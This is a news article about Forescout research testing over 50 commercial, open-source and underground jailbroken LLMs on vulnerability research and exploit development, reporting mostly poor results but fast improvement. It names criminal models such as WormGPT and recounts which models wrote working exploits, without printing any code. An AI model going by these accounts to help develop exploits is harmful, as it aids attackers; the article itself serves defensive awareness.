Putting AI-assisted ‘vibe hacking’ to the test

Table of Contents

Attackers are increasingly leveraging large language models (LLMs) to enhance attack workflows, but for all their advances in helping to write malicious scripts, these tools are not yet ready to turn run-of-the-mill cybercriminals into exploit developers.

According to tests performed by researchers from Forescout, LLMs have gotten fairly good at coding — particularly at vibe coding, the practice of using LLMs to produce applications through natural language prompts — but they are not yet as good at “vibe hacking.”

Forescout’s tests of over 50 LLMs, both from commercial AI companies that have safety limitations on malicious content and open-source ones with safeguards removed, revealed high failure rates for both vulnerability research and exploit development tasks.

“Even when models completed exploit development tasks, they required substantial user guidance, or manually steering the model toward viable exploitation paths,” the researchers found. “We are still far from LLMs that can autonomously generate fully functional exploits.”

However, many LLMs are improving fast, the researchers warn, having observed this over their three-month testing window. Tasks that initially failed in test runs in February became more feasible by April, with the latest reasoning models consistently outperforming traditional LLMs.

The rise of agentic AI, where models are capable of chaining multiple actions and tools, will likely reduce the hurdles that AI currently faces with complex tasks like exploit development, which requires debugging, tool orchestration, and the ability to incorporate feedback back into the workflow.

As such, the researchers conclude that while AI has not fully transformed how threat actors discover vulnerabilities and develop exploits, “the age of ‘vibe hacking’ is approaching, and defenders should start preparing now.”

This echoes what other security researchers and penetration testers shared with CSO earlier this year about how AI will impact the zero-day vulnerability and exploit ecosystem.

Simulating an opportunistic attacker

An attacker or researcher with significant experience in vulnerability research can find LLMs useful for automating some of their work, but only because they have the knowledge to guide the models and correct their mistakes.

Most cybercriminals looking to do the same won’t fare as well, whether using use a general-purpose AI model from OpenAI, Google, or Anthropic, or one of the many uncensored and jailbroken ones currently advertised on underground markets, such as WormGPT, WolfGPT, FraudGPT, LoopGPT, DarkGPT, DarkBert, PoisonGPT, EvilGPT, EvilAI, or GhostGPT, among others.

For their tests, Forescout’s researchers operated under the assumption that opportunistic attackers would want such models to return largely accurate results from basic prompts like “find a vulnerability in this code” and “write an exploit for the following code.”

The researchers chose two vulnerability research tasks from the STONESOUP dataset published by the Intelligence Advanced Research Projects Activity (IARPA) program of the US government’s Office of the Director of National Intelligence. One was a buffer overflow vulnerability in C code for a simple TFTP server; the other was a more complex null pointer dereference vulnerability in a server-side application also written in C.

For exploit development, the researchers selected two challenges from the IO NetGarage wargame: a level 5 challenge to write an arbitrary code execution exploit for a stack overflow vulnerability, and a level 9 challenge for a code execution exploit that involved leaking memory information.

“While we did not adhere to a formal prompt engineering methodology, all prompts were manually crafted and iteratively refined based on early errors,” the researchers wrote. “No in-context examples were included. Therefore, while our testing was rigorous, the results may not reflect the full potential of each LLM. Further improvements might be possible with advanced techniques, but that was not our goal. We focused on assessing what an opportunistic attacker, with limited tuning or optimization could realistically achieve.”

Underwhelming results

For each LLM test, the researchers repeated each task prompt five times to account for variability in responses. For exploit development tasks, models that failed the first task were not allowed to progress to the second, more complex one. The team tested 16 open-source models from Hugging Face that claimed to have been trained for cybersecurity tasks and were also jailbroken or uncensored, 23 models shared on cybercrime forums and Telegram chats for attack purposes, and 18 commercial models.

Open-source models performed the worst across all tasks. Only two reasoning models had partially correct responses to one of the vulnerability research tasks, but these too failed the second, more complex research task, as well as the first exploit development task.

Of the 23 underground models collected by the researchers, only 11 could be successfully tested via Telegram bots or web-based chat interfaces. These returned better results than the open-source models but ran into context length issues, with Telegram messages being limited to only 4096 characters. The responses were also full of false positives and false negatives, with context lost across prompts, or limitations on the number of prompts per day, making them impractical for exploit development tasks in particular, which require troubleshooting and feedback loops.

“Web-based models all succeeded in ED1 [exploit development task 1], though some used overly complex techniques,” the researchers found. “WeaponizedGPT was the most efficient, producing a working exploit in just two iterations. FlowGPT models struggled again with code formatting, which hampered usability. In ED2, all models that passed ED1, including the three FlowGPT variants, WeaponizedGPT, and WormGPT 5, failed to fully solve the task.”

The researchers failed to obtain access to the remaining 12 underground models, either because they were abandoned, the sellers denied to offer a free prompt demo, or the free prompt demo result wasn’t good enough to pay the high price to send more prompts.

Commercial LLMs, both hacking-focused and general purpose, performed the best, particularly in the first vulnerability research task, although some hallucinated. ChatGPT o4 and DeepSeek R1, both reasoning models, provided the best results, along with PentestGPT, which has both a free and paid version. PentestGPT was the only hacking-oriented commercial model that managed to write a functional exploit for the first exploit development task.

In total nine commercial models succeeded on ED1, but DeepSeek V3 stood out by writing a functional exploit on the first run without debugging being needed. DeepSeek V3 was also one of three models to successfully complete ED2, along with Gemini Pro 2.5 Experimental and ChatGPT o3-mini-high.

“Modern exploits often demand more skill than the controlled challenges we tested,” the researchers noted. “Even though most commercial LLMs succeeded in ED1 and a few in ED2, several recurring issues exposed the limits of current LLMs. Some models suggested unrealistic commands, like disabling ASLR before gaining root privileges, failed to perform fundamental arithmetic or fixated on an incorrect approach. Others stalled, or offered incomplete responses, sometimes due load balancing or context loss, especially under multi-step reasoning demands.”

LLMs not useful for most wannabe vulnerability hunters yet

Forescout’s researchers don’t believe that LLMs have lowered the barrier to entry into vulnerability research and exploit development just yet, because the current models have too many problems for novice cybercriminals to overcome.

Reviewing discussions from cybercriminal forums, the researchers found that most enthusiasm about LLMs comes from less experienced attackers, with veterans expressing skepticism about the utility of such tools.

But advances of agentic AI and improvement in reasoning models may soon change the equation. Companies must continue to practice cybersecurity fundamentals, including defense-in-depth, least privilege, network segmentation, cyber hygiene, and zero trust access.

“If AI lowers the barrier to launching attacks, we may see them become more frequent, but not necessarily more sophisticated,” the researchers surmised. “Rather than reinventing defensive strategies, organizations should focus on enforcing them more dynamically and effectively across all environments. Importantly, AI is not only a threat, it is a powerful tool for defenders.”

Useful Links

Edtior's Picks

Latest Articles

Putting AI-assisted ‘vibe hacking’ to the test

Simulating an opportunistic attacker

Underwhelming results

LLMs not useful for most wannabe vulnerability hunters yet

HEDA accuses Adoke of falsehood in new book, threatens legal action

Anyaoku, other eminent citizens set for three-day constitutional conference

You may also like

Leave a Comment Cancel Reply

Useful Links

Edtior's Picks

Latest Articles